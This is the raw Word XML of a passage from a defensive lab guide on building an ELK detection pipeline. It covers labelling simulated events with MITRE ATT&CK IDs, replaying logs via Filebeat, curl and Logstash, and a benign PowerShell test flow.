    <w:p w14:paraId="1E4FECDD" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="4255FED2">
          <v:rect id="_x0000_i1076" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3EA164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 xml:space="preserve">4.7 Tagging and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>labeling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> events with MITRE ATT&amp;CK IDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC261A1" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>To evaluate rules, add a field to events indicating which MITRE technique generated the log (helpful for benchmarking).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38283155" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F96D88" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t>Use a custom field while generating the test (e.g., add "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>atomic.mitre_technique</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>": "T1059.001" in manual JSON logs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EBEA94" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">For Atomic tests, wrap the invocation in a script that writes a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>labeled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> event to Windows Event Log or a custom log file which </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> picks up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C92E018" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example (append to syslog file on Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ABD8A1" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">logger -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>user.alert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> -t atomic "MITRE:T1059.001 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>SimulatedPowerShellInvocation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> -c 'Write-Output Test'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A25F26" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>In Logstash you can parse that and add a field:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1028F34C" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>filter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0A70D2" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  if "atomic" in [tags] or [message] =~ /MITRE:T/ {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4196E355" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    grok { match =&gt; { "message" =&gt; "%{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>DATA:mitre_label</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>}" } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549C12D0" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    mutate { </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>add_field</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> =&gt; { "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>mitre.technique</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>" =&gt; "%{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>mitre_label</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>}" } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028A94BA" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19784AE9" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DE8DFC" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>This labelling makes it straightforward to compute detection metrics (TP, FN) later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F9D604" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="781DA46A">
          <v:rect id="_x0000_i1077" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15940649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4.8 Replaying logs (log replay for mass-testing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC1E626" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>If you already have log files (e.g., prior PCAP-&gt;logs), you can replay them fast:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA73285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 xml:space="preserve">Method 1 — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> read-from-file (for log lines)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4849F5AD" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Place sample log file /opt/samples/powerlogs.log on ELK host or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5862D420" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Configure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> input to read that path and send events; set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>close_eof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>: true if you want one-time replay.</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> input example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6270A724" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>filebeat.inputs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C8EFEA" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>- type: log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A8A3B3" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  enabled: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219CCCA4" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  paths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1763756A" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    - /opt/samples/*.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9C2212" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  fields:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D40014" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    replay: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6513DC8D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Method 2 — Use curl to send JSON directly to Elasticsearch (for testing only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4600EC88" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">curl -u </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>elastic:changeme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> -H 'Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>' -XPOST 'http://localhost:9200/test-logs-2025.10.08/_doc' -d '{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>message":"simulated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> event", "mitre":"T1059.001"}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7EF90C" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>This immediately creates an index document for you to test dashboards/rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E24FA75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 xml:space="preserve">Method 3 — Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-input-http to post logs to Logstash pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA91DB8" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Start Logstash input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E5CCB2" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>input {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EAB2FD" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  http {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E16429" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    host =&gt; "0.0.0.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECC40F9" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    port =&gt; 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE5869E" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6A4665" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441B7937" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Then curl POST:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D061BCD" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:lastRenderedPageBreak/>
        <w:t>curl -XPOST 'http://logstash-host:8080' -H 'Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>' -d '{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>message":"test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>", "mitre":"T1059.001"}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E658C19" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="24396674">
          <v:rect id="_x0000_i1078" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BC620A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4.9 Example: Full flow demo for a PowerShell test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E09F3FF" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enable PowerShell operational logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> on Windows test host (see 4.6).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE259B9" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Run small Atomic test</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> or a benign PowerShell command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C98F11C" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t># e.g. simulate download command but do not download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7266B661" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> -Command "Write-Output '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>AtomicTest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> - PowerShell - Test' "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696FA710" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t># or via Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>AtomicTest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> T1059.001 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>ShowDetails</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> then run the show command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B690C84" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> will pick up Microsoft-Windows-PowerShell/Operational events and forward to Logstash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08121FE3" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Logstash pipeline</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> (example filter):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5E0BBA" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>filter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F4A441" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  if [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>event_provider</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>] == "Microsoft-Windows-PowerShell" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784E289A" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    mutate { </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>add_field</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> =&gt; { "mitre" =&gt; "T1059.001" } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697897BA" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">    # extract user/process/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>commandline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5261971B" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EECD2A" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58417C61" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Elasticsearch</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> indexes event; Kibana Discover shows the event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634D70F3" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Detection rule</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> (EQL/KQL) triggers an alert in Kibana Detections. (We’ll create rules in Step 5/6.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF300B5" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="491C3201">
          <v:rect id="_x0000_i1079" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="016EDED9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4.10 Useful Logstash pipeline examples &amp; files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1567DC10" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Suricata: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>suricata.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> (see 4.4 earlier).</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> input (Logstash) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>winlogbeat.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C721240" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>input {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F330EAF" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  beats { port =&gt; 5044 }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C7213E" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>}</w:t>
      </w:r>
    </w:p>
